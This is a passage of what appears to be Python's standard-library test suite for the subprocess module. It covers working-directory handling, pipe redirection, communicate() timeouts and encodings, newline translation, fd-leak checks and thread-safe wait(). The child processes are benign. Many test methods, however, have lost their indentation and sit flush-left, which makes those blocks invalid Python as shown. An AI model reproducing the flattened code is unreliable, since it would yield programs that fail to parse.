        # Normalize an expected cwd (for Tru64 support).
        # We can't use os.path.realpath since it doesn't expand Tru64 {memb}
        # strings. See bug #1063571.
        with support.change_cwd(cwd):
            return os.getcwd()

    # For use in the test_cwd* tests below.
    def _split_python_path(self):
        # Return normalized (python_dir, python_base).
        python_path = os.path.realpath(sys.executable)
        return os.path.split(python_path)

    # For use in the test_cwd* tests below.
    def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
        # Invoke Python via Popen, and assert that (1) the call succeeds,
        # and that (2) the current working directory of the child process
        # matches *expected_cwd*.
        p = subprocess.Popen([python_arg, "-c",
                              "import os, sys; "
                              "sys.stdout.write(os.getcwd()); "
                              "sys.exit(47)"],
                             stdout=subprocess.PIPE,
                             **kwargs)
        self.addCleanup(p.stdout.close)
        p.wait()
        self.assertEqual(47, p.returncode)
        # Compare case-insensitively where the platform requires it.
        normcase = os.path.normcase
        self.assertEqual(normcase(expected_cwd),
                         normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
class _PathLikeObj:
def __fspath__(self):
return temp_dir
self._assert_cwd(temp_dir, sys.executable, cwd=_PathLikeObj())
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
    @unittest.skipIf(mswindows, "pending resolution of issue #15533")
    def test_cwd_with_relative_executable(self):
        # Check that Popen looks for executable relative to cwd if executable
        # is relative (and that executable takes precedence over args[0]).
        python_dir, python_base = self._split_python_path()
        # e.g. "./python" -- resolvable only from the interpreter's own dir.
        rel_python = os.path.join(os.curdir, python_base)
        # args[0] is deliberately bogus: executable= must win over it.
        doesntexist = "somethingyoudonthave"
        with support.temp_cwd() as wrong_dir:
            # Before calling with the correct cwd, confirm that the call fails
            # without cwd and with the wrong cwd.
            self.assertRaises(FileNotFoundError, subprocess.Popen,
                              [doesntexist], executable=rel_python)
            self.assertRaises(FileNotFoundError, subprocess.Popen,
                              [doesntexist], executable=rel_python,
                              cwd=wrong_dir)
            python_dir = self._normalize_cwd(python_dir)
            self._assert_cwd(python_dir, doesntexist, executable=rel_python,
                             cwd=python_dir)
    def test_cwd_with_absolute_arg(self):
        # Check that Popen can find the executable when the cwd is wrong
        # if args[0] is an absolute path.
        python_dir, python_base = self._split_python_path()
        abs_python = os.path.join(python_dir, python_base)
        rel_python = os.path.join(os.curdir, python_base)
        with support.temp_dir() as wrong_dir:
            # Before calling with an absolute path, confirm that using a
            # relative path fails.
            self.assertRaises(FileNotFoundError, subprocess.Popen,
                              [rel_python], cwd=wrong_dir)
            wrong_dir = self._normalize_cwd(wrong_dir)
            # Absolute args[0] must be found regardless of cwd.
            self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
    @unittest.skipIf(sys.base_prefix != sys.prefix,
                     'Test is not venv-compatible')
    def test_executable_with_cwd(self):
        # executable= overrides args[0]; the bogus args[0] is never resolved.
        python_dir, python_base = self._split_python_path()
        python_dir = self._normalize_cwd(python_dir)
        self._assert_cwd(python_dir, "somethingyoudonthave",
                         executable=sys.executable, cwd=python_dir)
    @unittest.skipIf(sys.base_prefix != sys.prefix,
                     'Test is not venv-compatible')
    @unittest.skipIf(sysconfig.is_python_build(),
                     "need an installed Python. See #7774")
    def test_executable_without_cwd(self):
        # For a normal installation, it should work without 'cwd'
        # argument. For test runs in the build directory, see #7774.
        # executable= alone (no cwd override) must still launch the child
        # in the parent's current directory.
        self._assert_cwd(os.getcwd(), "somethingyoudonthave",
                         executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
    def test_stderr_redirect_with_no_stdout_redirect(self):
        # test stderr=STDOUT while stdout=None (not set)
        #
        # - grandchild prints to stderr
        # - child redirects grandchild's stderr to its stdout
        # - the parent should get grandchild's stderr in child's stdout
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys, subprocess;'
                              'rc = subprocess.call([sys.executable, "-c",'
                              '    "import sys;"'
                              '    "sys.stderr.write(\'42\')"],'
                              '    stderr=subprocess.STDOUT);'
                              'sys.exit(rc)'],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        stdout, stderr = p.communicate()
        #NOTE: stdout should get stderr from grandchild
        self.assertStderrEqual(stdout, b'42')
        self.assertStderrEqual(stderr, b'')    # should be empty
        self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
    def test_stdout_filedes_of_stdout(self):
        # stdout is set to 1 (#1531862).
        # To avoid printing the text on stdout, we do something similar to
        # test_stdout_none (see above).  The parent subprocess calls the child
        # subprocess passing stdout=1, and this test uses stdout=PIPE in
        # order to capture and check the output of the parent. See #11963.
        # rc == 18: os.write() returns the byte count of b'test with stdout=1'.
        code = ('import sys, subprocess; '
                'rc = subprocess.call([sys.executable, "-c", '
                '    "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
                    'b\'test with stdout=1\'))"], stdout=1); '
                'assert rc == 18')
        p = subprocess.Popen([sys.executable, "-c", code],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        out, err = p.communicate()
        self.assertEqual(p.returncode, 0, err)
        self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
    # Windows requires at least the SYSTEMROOT environment variable to start
    # Python
    @unittest.skipIf(sys.platform == 'win32',
                     'cannot test an empty env on Windows')
    @unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
                     'The Python shared library cannot be loaded '
                     'with an empty environment.')
    def test_empty_env(self):
        """Verify that env={} is as empty as possible."""
        def is_env_var_to_ignore(n):
            """Determine if an environment variable is under our control."""
            # This excludes some __CF_* and VERSIONER_* keys MacOS insists
            # on adding even when the environment in exec is empty.
            # Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
            return ('VERSIONER' in n or '__CF' in n or  # MacOS
                    n == 'LD_PRELOAD' or n.startswith('SANDBOX') or  # Gentoo
                    n == 'LC_CTYPE')  # Locale coercion triggered
        with subprocess.Popen([sys.executable, "-c",
                               'import os; print(list(os.environ.keys()))'],
                              stdout=subprocess.PIPE, env={}) as p:
            stdout, stderr = p.communicate()
            # NOTE(review): eval() of child output is acceptable only because
            # the child runs our own trusted code above.
            child_env_names = eval(stdout.strip())
            self.assertIsInstance(child_env_names, list)
            child_env_names = [k for k in child_env_names
                               if not is_env_var_to_ignore(k)]
            self.assertEqual(child_env_names, [])
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
    def test_communicate_timeout(self):
        # Child prints to stderr, sleeps 1s, prints again, then echoes stdin.
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os,time;'
                              'sys.stderr.write("pineapple\\n");'
                              'time.sleep(1);'
                              'sys.stderr.write("pear\\n");'
                              'sys.stdout.write(sys.stdin.read())'],
                             universal_newlines=True,
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        # The first communicate() must time out while the child sleeps...
        self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
                          timeout=0.3)
        # Make sure we can keep waiting for it, and that we get the whole output
        # after it completes.
        (stdout, stderr) = p.communicate()
        self.assertEqual(stdout, "banana")
        self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
    def test_communicate_timeout_large_output(self):
        # Test an expiring timeout while the child is outputting lots of data.
        # Each write is 64 KiB -- comparable to a typical OS pipe buffer, so
        # the parent must keep draining while the timeout is pending.
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os,time;'
                              'sys.stdout.write("a" * (64 * 1024));'
                              'time.sleep(0.2);'
                              'sys.stdout.write("a" * (64 * 1024));'
                              'time.sleep(0.2);'
                              'sys.stdout.write("a" * (64 * 1024));'
                              'time.sleep(0.2);'
                              'sys.stdout.write("a" * (64 * 1024));'],
                             stdout=subprocess.PIPE)
        self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
        # The retry must return everything the child ever wrote.
        (stdout, _) = p.communicate()
        self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
    def test_communicate_pipe_buf(self):
        # communicate() with writes larger than pipe_buf
        # This test will probably deadlock rather than fail, if
        # communicate() does not work properly.
        # NOTE(review): this pipe is created and closed immediately --
        # presumably so the following Popen reuses these fd numbers; confirm.
        x, y = os.pipe()
        os.close(x)
        os.close(y)
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;'
                              'sys.stdout.write(sys.stdin.read(47));'
                              'sys.stderr.write("x" * %d);'
                              'sys.stdout.write(sys.stdin.read())' %
                              support.PIPE_MAX_SIZE],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        self.addCleanup(p.stdin.close)
        # Larger than any OS pipe buffer: forces interleaved read/write.
        string_to_write = b"a" * support.PIPE_MAX_SIZE
        (stdout, stderr) = p.communicate(string_to_write)
        self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
    def test_universal_newlines(self):
        # SETBINARY presumably forces the child's stdout into binary mode
        # (Windows) so the \r bytes below reach us untranslated -- see the
        # module-level definition.
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;' + SETBINARY +
                              'buf = sys.stdout.buffer;'
                              'buf.write(sys.stdin.readline().encode());'
                              'buf.flush();'
                              'buf.write(b"line2\\n");'
                              'buf.flush();'
                              'buf.write(sys.stdin.read().encode());'
                              'buf.flush();'
                              'buf.write(b"line4\\n");'
                              'buf.flush();'
                              'buf.write(b"line5\\r\\n");'
                              'buf.flush();'
                              'buf.write(b"line6\\r");'
                              'buf.flush();'
                              'buf.write(b"\\nline7");'
                              'buf.flush();'
                              'buf.write(b"\\nline8");'],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             universal_newlines=1)
        with p:
            p.stdin.write("line1\n")
            p.stdin.flush()
            self.assertEqual(p.stdout.readline(), "line1\n")
            p.stdin.write("line3\n")
            p.stdin.close()
            self.addCleanup(p.stdout.close)
            # \n, \r\n and \r must all be normalized to "\n" on read.
            self.assertEqual(p.stdout.readline(),
                             "line2\n")
            self.assertEqual(p.stdout.read(6),
                             "line3\n")
            self.assertEqual(p.stdout.read(),
                             "line4\nline5\nline6\nline7\nline8")
    def test_universal_newlines_communicate(self):
        # universal newlines through communicate()
        # SETBINARY presumably forces binary-mode stdout on Windows -- see
        # the module-level definition.
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;' + SETBINARY +
                              'buf = sys.stdout.buffer;'
                              'buf.write(b"line2\\n");'
                              'buf.flush();'
                              'buf.write(b"line4\\n");'
                              'buf.flush();'
                              'buf.write(b"line5\\r\\n");'
                              'buf.flush();'
                              'buf.write(b"line6\\r");'
                              'buf.flush();'
                              'buf.write(b"\\nline7");'
                              'buf.flush();'
                              'buf.write(b"\\nline8");'],
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             universal_newlines=1)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        (stdout, stderr) = p.communicate()
        # \n, \r\n and \r must all be normalized to "\n".
        self.assertEqual(stdout,
                         "line2\nline4\nline5\nline6\nline7\nline8")
    def test_universal_newlines_communicate_stdin(self):
        # universal newlines through communicate(), with only stdin
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;' + SETBINARY + textwrap.dedent('''
                               s = sys.stdin.readline()
                               assert s == "line1\\n", repr(s)
                               s = sys.stdin.read()
                               assert s == "line3\\n", repr(s)
                               ''')],
                             stdin=subprocess.PIPE,
                             universal_newlines=1)
        (stdout, stderr) = p.communicate("line1\nline3\n")
        # The child asserts it received the text intact; returncode 0 == pass.
        self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
    def test_universal_newlines_communicate_stdin_stdout_stderr(self):
        # universal newlines through communicate(), with stdin, stdout, stderr
        # The child echoes stdin and emits a mix of \r / \r\n endings on both
        # output streams; all must be normalized to "\n" by text mode.
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;' + SETBINARY + textwrap.dedent('''
                               s = sys.stdin.buffer.readline()
                               sys.stdout.buffer.write(s)
                               sys.stdout.buffer.write(b"line2\\r")
                               sys.stderr.buffer.write(b"eline2\\n")
                               s = sys.stdin.buffer.read()
                               sys.stdout.buffer.write(s)
                               sys.stdout.buffer.write(b"line4\\n")
                               sys.stdout.buffer.write(b"line5\\r\\n")
                               sys.stderr.buffer.write(b"eline6\\r")
                               sys.stderr.buffer.write(b"eline7\\r\\nz")
                               ''')],
                             stdin=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             universal_newlines=True)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        (stdout, stderr) = p.communicate("line1\nline3\n")
        self.assertEqual(p.returncode, 0)
        self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
        # Python debug build push something like "[42442 refs]\n"
        # to stderr at exit of subprocess.
        # Don't use assertStderrEqual because it strips CR and LF from output.
        self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
    def test_universal_newlines_communicate_encodings(self):
        # Check that universal newlines mode works for various encodings,
        # in particular for encodings in the UTF-16 and UTF-32 families.
        # See issue #15595.
        #
        # UTF-16 and UTF-32-BE are sufficient to check both with BOM and
        # without, and UTF-16 and UTF-32.
        for encoding in ['utf-16', 'utf-32-be']:
            # Child emits '1\r\n2\r3\n4' encoded; the parent must decode it
            # and normalize every line ending to "\n".
            code = ("import sys; "
                    r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
                    encoding)
            args = [sys.executable, '-c', code]
            # We set stdin to be non-None because, as of this writing,
            # a different code path is used when the number of pipes is
            # zero or one.
            popen = subprocess.Popen(args,
                                     stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE,
                                     encoding=encoding)
            stdout, stderr = popen.communicate(input='')
            self.assertEqual(stdout, '1\n2\n3\n4')
    def test_communicate_errors(self):
        # 'errors' controls how undecodable bytes from the child's output
        # are handled when decoding with the given encoding.
        for errors, expected in [
            ('ignore', ''),
            ('replace', '\ufffd\ufffd'),
            ('surrogateescape', '\udc80\udc80'),
            ('backslashreplace', '\\x80\\x80'),
        ]:
            # Child emits two bytes (\x80\x80) that are invalid UTF-8.
            code = ("import sys; "
                    r"sys.stdout.buffer.write(b'[\x80\x80]')")
            args = [sys.executable, '-c', code]
            # We set stdin to be non-None because, as of this writing,
            # a different code path is used when the number of pipes is
            # zero or one.
            popen = subprocess.Popen(args,
                                     stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE,
                                     encoding='utf-8',
                                     errors=errors)
            stdout, stderr = popen.communicate(input='')
            self.assertEqual(stdout, '[{}]'.format(expected))
    def test_no_leaking(self):
        # Make sure we leak no resources
        # Strategy: nearly exhaust the fd limit, free a handful of fds, then
        # spawn subprocesses repeatedly -- a leak would hit EMFILE quickly.
        if not mswindows:
            max_handles = 1026 # too much for most UNIX systems
        else:
            max_handles = 2050 # too much for (at least some) Windows setups
        handles = []
        tmpdir = tempfile.mkdtemp()
        try:
            for i in range(max_handles):
                try:
                    tmpfile = os.path.join(tmpdir, support.TESTFN)
                    handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
                except OSError as e:
                    if e.errno != errno.EMFILE:
                        raise
                    break
            else:
                self.skipTest("failed to reach the file descriptor limit "
                              "(tried %d)" % max_handles)
            # Close a couple of them (should be enough for a subprocess)
            for i in range(10):
                os.close(handles.pop())
            # Loop creating some subprocesses. If one of them leaks some fds,
            # the next loop iteration will fail by reaching the max fd limit.
            for i in range(15):
                p = subprocess.Popen([sys.executable, "-c",
                                      "import sys;"
                                      "sys.stdout.write(sys.stdin.read())"],
                                     stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE,
                                     stderr=subprocess.PIPE)
                data = p.communicate(b"lime")[0]
                self.assertEqual(data, b"lime")
        finally:
            for h in handles:
                os.close(h)
            shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
    def test_wait_timeout(self):
        # Child sleeps 0.3s, far longer than the 0.0001s timeout below.
        p = subprocess.Popen([sys.executable,
                              "-c", "import time; time.sleep(0.3)"],)
        with self.assertRaises(subprocess.TimeoutExpired) as c:
            p.wait(timeout=0.0001)
        self.assertIn("0.0001", str(c.exception))  # For coverage of __str__.
        # Some heavily loaded buildbots (sparc Debian 3.x) require this much
        # time to start.
        self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
    def _test_bufsize_equal_one(self, line, expected, universal_newlines):
        # subprocess may deadlock with bufsize=1, see issue #21332
        with subprocess.Popen([sys.executable, "-c", "import sys;"
                               "sys.stdout.write(sys.stdin.readline());"
                               "sys.stdout.flush()"],
                              stdin=subprocess.PIPE,
                              stdout=subprocess.PIPE,
                              stderr=subprocess.DEVNULL,
                              bufsize=1,
                              universal_newlines=universal_newlines) as p:
            p.stdin.write(line) # expect that it flushes the line in text mode
            os.close(p.stdin.fileno()) # close it without flushing the buffer
            read_line = p.stdout.readline()
            # The fd behind p.stdin is already gone; its close() may fail
            # with EBADF.  Swallow that and detach the object so
            # Popen.__exit__ does not try to close it a second time.
            try:
                p.stdin.close()
            except OSError:
                pass
            p.stdin = None
        self.assertEqual(p.returncode, 0)
        self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
    def test_leaking_fds_on_error(self):
        # see bug #5179: Popen leaks file descriptors to PIPEs if
        # the child fails to execute; this will eventually exhaust
        # the maximum number of open fds. 1024 seems a very common
        # value for that limit, but Windows has 2048, so we loop
        # 1024 times (each call leaked two fds).
        for i in range(1024):
            with self.assertRaises(OSError) as c:
                subprocess.Popen(['nonexisting_i_hope'],
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
            # ignore errors that indicate the command was not found
            # (EACCES may occur when an unreadable directory is on PATH)
            if c.exception.errno not in (errno.ENOENT, errno.EACCES):
                raise c.exception
    @unittest.skipIf(threading is None, "threading required")
    def test_double_close_on_error(self):
        # Issue #18851
        # A background thread keeps allocating fds while Popen fails; if
        # Popen's error path closed an fd twice, it would close one of the
        # thread's fresh fds by mistake.
        fds = []
        def open_fds():
            for i in range(20):
                fds.extend(os.pipe())
                time.sleep(0.001)
        t = threading.Thread(target=open_fds)
        t.start()
        try:
            with self.assertRaises(EnvironmentError):
                subprocess.Popen(['nonexisting_i_hope'],
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
        finally:
            t.join()
            exc = None
            for fd in fds:
                # If a double close occurred, some of those fds will
                # already have been closed by mistake, and os.close()
                # here will raise.
                try:
                    os.close(fd)
                except OSError as e:
                    exc = e
            # Re-raise the last failure only after closing everything.
            if exc is not None:
                raise exc
    @unittest.skipIf(threading is None, "threading required")
    def test_threadsafe_wait(self):
        """Issue21291: Popen.wait() needs to be threadsafe for returncode."""
        proc = subprocess.Popen([sys.executable, '-c',
                                 'import time; time.sleep(12)'])
        self.assertEqual(proc.returncode, None)
        results = []
        def kill_proc_timer_thread():
            results.append(('thread-start-poll-result', proc.poll()))
            # terminate it from the thread and wait for the result.
            proc.kill()
            proc.wait()
            results.append(('thread-after-kill-and-wait', proc.returncode))
            # this wait should be a no-op given the above.
            proc.wait()
            results.append(('thread-after-second-wait', proc.returncode))
        # This is a timing sensitive test, the failure mode is
        # triggered when both the main thread and this thread are in
        # the wait() call at once.  The delay here is to allow the
        # main thread to most likely be blocked in its wait() call.
        t = threading.Timer(0.2, kill_proc_timer_thread)
        t.start()
        if mswindows:
            # Windows kill() maps to process termination with exit code 1.
            expected_errorcode = 1
        else:
            # Should be -9 because of the proc.kill() from the thread.
            expected_errorcode = -9
        # Wait for the process to finish; the thread should kill it
        # long before it finishes on its own.  Supplying a timeout
        # triggers a different code path for better coverage.
        proc.wait(timeout=20)
        self.assertEqual(proc.returncode, expected_errorcode,
                         msg="unexpected result in wait from main thread")
        # This should be a no-op with no change in returncode.
        proc.wait()
